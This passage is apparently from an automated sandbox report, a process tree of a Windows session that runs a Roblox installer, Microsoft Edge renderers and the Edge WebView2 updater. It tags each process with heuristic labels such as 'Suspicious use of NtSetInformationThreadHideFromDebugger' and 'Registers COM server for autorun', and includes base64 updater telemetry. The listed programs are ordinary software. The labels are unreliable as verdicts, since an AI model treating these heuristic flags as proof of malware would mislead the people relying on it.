                                                                                    • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\MicrosoftEdgeUpdate.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
                                                                                      4⤵
                                                                                      • Sets file execution options in registry
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks system information in the registry
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:728
                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Modifies registry class
                                                                                        PID:1348
                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Modifies registry class
                                                                                        PID:5784
                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Registers COM server for autorun
                                                                                          • Modifies registry class
                                                                                          PID:4080
                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Registers COM server for autorun
                                                                                          • Modifies registry class
                                                                                          PID:5736
                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Registers COM server for autorun
                                                                                          • Modifies registry class
                                                                                          PID:4436
                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QzhERjBFRDQtMDZEMS00MERBLTgyQzItMEIxQzhEQzJFNDZCfSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsyMUNFQzg3NS1CNkM0LTRFM0ItQjUxMy0zQzE1NjE2RDMzOTl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xODUuMTciIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3ODAzODk0MzgxIiBpbnN0YWxsX3RpbWVfbXM9IjE1NTMiLz48L2FwcD48L3JlcXVlc3Q-
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks system information in the registry
                                                                                        PID:5304
                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{C8DF0ED4-06D1-40DA-82C2-0B1C8DC2E46B}" /silent
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:4044
                                                                                  • C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\RobloxPlayerBeta.exe
                                                                                    "C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\RobloxPlayerBeta.exe" -app -isInstallerLaunch
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:5196
                                                                                • C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
                                                                                  "C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:740
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
                                                                                  2⤵
                                                                                    PID:5864
                                                                                  • C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\RobloxPlayerBeta.exe
                                                                                    "C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:oDwFC4Vq5hpQah36gPtS0RwiPlApGFsPB73tls8I5KgwAq36akmZtBsUCwkhAziBMQMNEMu0XCcznS2HdWPRP21NEbWRo4GLlRsL1iaWIkNwY2abTDHgTntmYs9G-8bdZQvftO9RngvvMhdGBWfYJVw6uUYmOoTVj6qbwGxBk1OOx4I7l4Ed66MS_sPFVym18rHsTh5aK7e4sO8DVkJfw7FUoDpWNuMedj3cdDxMEqQ+launchtime:1712030357348+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D222689473143%26placeId%3D2753915549%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D561bf624-1b1b-4a99-a975-4bd603a13199%26joinAttemptOrigin%3DPlayButton+browsertrackerid:222689473143+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:4660
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:1
                                                                                    2⤵
                                                                                      PID:4860
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
                                                                                      2⤵
                                                                                        PID:5156
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
                                                                                        2⤵
                                                                                          PID:5112
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
                                                                                          2⤵
                                                                                            PID:5916
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
                                                                                            2⤵
                                                                                              PID:3928
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1
                                                                                              2⤵
                                                                                                PID:6080
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:5356
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:4300
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:1092
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7572 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:6004
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:5208
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:4412
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:6024
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:3680
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:6020
                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:5488
                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:5632
                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                    1⤵
                                                                                                                      PID:5556
                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:4528
                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks system information in the registry
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:3664
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QzhERjBFRDQtMDZEMS00MERBLTgyQzItMEIxQzhEQzJFNDZCfSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGRDNCQzlBMS1ERjFDLTQzNDUtODExNy02NzBEMkY0MzZERUZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3ODE0Nzk0Mjk2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks system information in the registry
                                                                                                                          PID:4792
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\MicrosoftEdge_X64_123.0.2420.65.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\MicrosoftEdge_X64_123.0.2420.65.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:6024
                                                                                                                          • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\EDGEMITMP_B0E0D.tmp\setup.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\EDGEMITMP_B0E0D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\MicrosoftEdge_X64_123.0.2420.65.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            PID:5752
                                                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\EDGEMITMP_B0E0D.tmp\setup.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\EDGEMITMP_B0E0D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=123.0.6312.87 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2E8D5810-6F04-4192-93F1-A8DE34BC22D1}\EDGEMITMP_B0E0D.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=123.0.2420.65 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff6cebabaf8,0x7ff6cebabb04,0x7ff6cebabb10
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:5424
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QzhERjBFRDQtMDZEMS00MERBLTgyQzItMEIxQzhEQzJFNDZCfSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntFOTE4QjlBNy1EM0QyLTQxNTgtQjFGMS01QzNGOTE0Q0I3MDV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEyMy4wLjI0MjAuNjUiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijc4MzEwMjQxNDIiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3ODMxMTE2NTI1IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iODA2MTk1NDE3MCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNjZlMGI5M2QtYjQ2OS00ZmI1LTgyMGItMjcwNGE4ZDdhOWU0P1AxPTE3MTI2MzUyMTImYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9Y0QzQ2hOJTJiY2t5SFhpdHpuYkI2UnJ4TVFYdG1oclBYR3J3ZXdCZVc3ZnRzZ1M3bVBtb2lEdFoxV1FKd0NKTVl3UFpMJTJiTERSa0JOa0tqY0I1V2lhQ1FnJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTcyMDU3NTYwIiB0b3RhbD0iMTcyMDU3NTYwIiBkb3dubG9hZF90aW1lX21zPSIxMzQ2NCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjgwNjIzODQ3NjciIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI4MDgzNjc0NDAyIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI4NzA4MTMzNzQzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iOTM0IiBkb3dubG9hZF90aW1lX21zPSIyMzExMiIgZG93bmxvYWRlZD0iMTcyMDU3NTYwIiB0b3RhbD0iMTcyMDU3NTYwIiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI2MjQ0MiIvPjwvYXBwPjwvcmVxdWVzdD4
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks system information in the registry
                                                                                                                          PID:5220
